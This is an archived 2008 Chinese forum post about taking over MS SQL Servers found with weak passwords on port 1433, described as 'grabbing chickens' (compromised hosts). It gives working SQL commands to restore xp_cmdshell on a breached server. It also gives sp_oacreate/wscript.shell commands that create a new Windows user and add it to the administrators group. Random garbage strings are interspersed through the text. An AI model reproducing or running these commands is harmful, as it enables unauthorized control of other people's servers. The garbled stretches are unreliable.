我爱电脑技术论坛's Archiver

不和人说话 发表于 2008-6-28 10:36

SQL弱口令1433抓鸡遇到问题

扫到SQL弱口令后利用SQLTOOLS出现未能找到存储过程 'master..xp_cmdshell'@%?ig0t4_si
这种情况的主要原因是删除了扩展存储过过程xp_cmdshell,有一个恢复的办法,如果不成功说明被改名了5Wc-TQK\8sob5P!e
G W7L5G!W vo s
使用SQLTOOLS连接,连接后在利用目录下点执行数据库命令,执行:
"`6q1D~&] EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
%CMk0Lr3`9p 运气好的话就成功了,如果你想让你的肉鸡用SQL执行不了DOS命令的话,执行:7p&of2k pz!E3f%\#oC
sp_dropextendedproc "xp_cmdshell"*C5v u3O~*l
就执行不了DOS命令了,当然用上面的语句可以复原。
m1}0e,w:s-P"r U
Vo%n#R1C b 用SQLTOOLS可以连接成功,执行DOS命令,却总是显示这个、、、拒绝了对对象 'xp_cmdshell'(数据库 'master',所有者 'dbo')的 EXECUTE 权限。'Fi:Y^BC
怎么解决????
:],Jeo%rC~*`%c 上传文件也不行。。。d-ubC,`9` s5zd6XyT
1 未能找到存储过程'master..xpcmdshell'。OW,v8RE5X"rW

$H%TTrx 恢复方法:查询分离器连接后,v^!wuMh2b&I-X {
'a-Ob+}G_
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int,qpQr.s4hr6wK
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll',u0n)hl&G8U S&z x U
然后按F5键命令执行完毕。 yJM,`,[1K/[

nlg rhWL Y 2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一DLL。原因126(找不到指定模块。)
#Z2k&RQ2Dh.y[,Q l @b6FSk
恢复方法:查询分离器连接后,
b{ aiZ9D)WQ
E5Z;bn+[#{k6m 第一步执行:sp_dropextendedproc "xp_cmdshell",
Om4F[w 第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
KX!B'l"gd] 然后按F5键命令执行完毕。
#arLD/jH
!h0Q&J%^%N;B6?&`&m 3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
o9G-Oz?a(A-[^
yR Uf"q!x~ 恢复方法:查询分离器连接后,
&f%o5M O?;HF? 第一步执行:exec sp_dropextendedproc 'xp_cmdshell'@T\&o,p y
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'/@*S;r DW@9U V&N
然后按F5键命令执行完毕。
*S4A7d#N}6y(aZ fW!y2hr"eK L
四.终极方法:'r#{ c5dyw1dn B U

6`"G:V+k E+c 如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
5I0V!y"y*M 3nt FDw{F\
查询分离器连接后,s nD&Z\|"CrdKG
6[GF8on#B
2000servser系统:g6^5pmg:vQ#C(f

k9m,r4V'a Q declare @shell int exec sp_oacreate 'wscript.shell',@shell output
-aiw5u7~E(xO8s0V exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 新用户 密码 /add'
G$|{+h$G7i U*g l0^Au3M8t o2J
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod r0G;G#T%iM
@shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 新用户 /add'
Q$_GJX/K} W#L+f\4o rinL-]
xp或2003server系统:1[fu#j:z;dY'j|

9nE2F`:Q%vr*b declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod
gdr|0~@ i#D,I @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'ahR5S5jKJ mDh
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethodk_5N!d:P(eq
@shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'] jq9Dn_ m
n]ul{$V5W7~K
还不行就没办法了

页: [1]

Powered by Discuz! Archiver 6.1.0  © 2001-2007 Comsenz Inc.